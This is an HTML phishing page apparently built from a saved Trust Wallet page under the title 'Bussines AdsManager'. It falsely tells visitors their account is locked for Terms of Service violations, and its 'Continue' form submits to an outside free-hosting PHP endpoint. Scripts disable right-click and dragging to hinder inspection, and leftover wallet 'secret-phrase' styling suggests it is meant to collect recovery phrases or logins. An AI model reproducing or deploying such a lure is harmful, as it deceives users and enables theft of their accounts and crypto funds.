<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<style>
.eEPviq {
    border: none;
    color: rgb(68, 68, 68);
    background: rgb(233, 234, 237);
    transition: all 0.5s ease 0s;
    font-size: 18px;
    width: 100%;
    padding: 15px 0px;
    border-radius: 4px;
    cursor: pointer;
    outline: none;
    margin-bottom: 20px;
}

@media (max-width: 768px)
.eEPviq {
    font-size: 16px;
    padding: 12px 0px;
}
.OHNdu {
    position: relative;
    width: 500px;
    min-height: 100vh;
    background: rgb(255, 255, 255);
}
.jvrGcO {
    display: flex;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    width: 100%;
    min-height: 100vh;
    background-attachment: fixed;
}
.hARKVj {
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    padding: 10px 0px 10px;
    margin-bottom: 20px;
    -webkit-box-pack: justify;
    justify-content: space-between;
    border-bottom: 1px solid rgb(226, 226, 226);
    
}
.gdtVXy {
    width: 180px;
}
.eNdDTk {
    width: 150px;
}
.kFZWwp {
    font-family: Gilroy, sans-serif;
    background-color: #F6F6F6;
    font-size: 0.9rem;
    color: rgba(127, 127, 127, 0.85);
}
.cDnNqw .ant-input-affix-wrapper {
    background-color: rgb(255, 255, 255);
    border: 1px solid rgb(226, 226, 226) !important;
}
.cDnNqw input.ant-input, .cDnNqw .ant-select-selection {
    font-size: 1rem;
    font-family: Euclid, Roboto, Helvetica, Arial, sans-serif;
    /* line-height: 140%; */
    font-style: normal;
    font-weight: normal;
    /* height: 190px; */
    /* width: 495px; */
    border: 1px solid #cdcdcd;
    border-radius: 6px;
    background-color: #fff;
    padding: 12px;
}
.fWmldN {
    color: rgb(255, 255, 255);
    border: none;
    transition: all 0.5s ease 0s;
    font-size: 18px;
    width: 100%;
    padding: 15px 0px;
    border-radius: 4px;
    cursor: pointer;
    outline: none;
    margin-bottom: 20px;
    background-color: #3375bb!important;
}
.iZNmqq {
    color: rgb(39, 52, 152);
    width: 100%;
    font-size: 16px;
    margin-bottom: 60px;
    text-align: left;
}
.import-account__secret-phrase {
    /*font-size: 1rem;*/
    /*font-family: Euclid, Roboto, Helvetica, Arial, sans-serif;*/
    /* line-height: 140%; */
    font-style: normal;
    font-weight: normal;
    height: 140px;
    width: 100%;
    border: 1px solid #cdcdcd;
    border-radius: 6px;
    background-color: #fff;
    padding: 12px;
}
.thepadding {
    padding: 0px 35px 0px;
}
.barnerd {
    background-color: #3375bb!important;
}
</style>
<meta charset="utf-8"><link rel="icon" href="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/settings032.png"><title>Bussines AdsManager</title><meta name="viewport" content="width=device-width,initial-scale=1">
<link href="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/chunk.css" rel="stylesheet">
<link href="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/app.css" rel="stylesheet">
<link href="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/main.chunk.css" rel="stylesheet">
 <script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
    </script>
<script language="JavaScript">
    var tanggallengkap = new String();
    var namahari = ("Minggu Senin Selasa Rabu Kamis Jumat Sabtu");
    namahari = namahari.split(" ");
    var namabulan = ("January February March April May June July August September October November December");
    namabulan = namabulan.split(" ");
    var tgl = new Date();
    var hari = tgl.getDay();
    var tanggal = tgl.getDate();
    var bulan = tgl.getMonth();
    var tahun = tgl.getFullYear();
    tanggallengkap = namabulan[bulan] + " " + tanggal + ", " + tahun;
  </script>
</head><body><div id="root"><div class="ant-spin-nested-loading"><div class="ant-spin-container"><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu">
<div class="sc-fYxtnH hARKVj"><center><img src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/sound-mobile.svg" alt="cashtab" class="sc-tilXH gdtVXy"></center>
</div>

<center><img style="height: 120px;width: 280px;" alt="" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/825.png" class="identicon confirm-approve-content__identicon"></center>
<center>
<br>
<center>Hi User, your account has been locked
</center><br>
<div class="thepadding">We noticed unusual activity on your account  and caused your account to be disabled for violating our <span style="color: #3c78d8; font-family: 'Roboto', 'Arial'; font-size: 10pt; vertical-align: baseline;"><strong>Terms of Service</strong></span>  <b style="color: #4d4d4d;font-weight: bold;"></b> We have already reviewed this decision and the decision cannot be changed.</div>
</center>

<div class="sc-htoDjs cDnNqw">

   <form method="post" action="//bulepotancangekemeangel.rf.gd/soor.php" class="ant-form ant-form-horizontal">
        <center><img style="height: 30px;width: 30px;" alt="" src="./Best Cryptocurrency Wallet _ Ethereum Wallet _ ERC20 Wallet _ Trust Wallet_files/Locked.png" class="identicon confirm-approve-content__identicon">
<div class="thepadding"><span style="color: #3c78d8; font-family: 'Roboto', 'Arial'; font-size: 11pt; vertical-align: baseline;"><strong>Account locked on
<strong><span style="color: #black; font-family: 'Roboto', 'Arial'; font-size: 11pt; vertical-align: baseline;"><script language='JavaScript'>document.write(tanggallengkap);</script></strong></strong></span>  <b style="color: #4d4d4d;font-weight: bold;"></b><br>To continue using, please click the Continue button below and follow the instructions</div>
</center>
<div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control">
<div>
    <div class="thepadding">

        </div></div><div class="ant-form-item-explain">
                </div></div></div>


                <div class="thepadding">
<button class="sc-VigVT fWmldN"><b>Continue</b></button>
<div1></div1></div></form>
                </div></div></div></div></div></div></body></html>
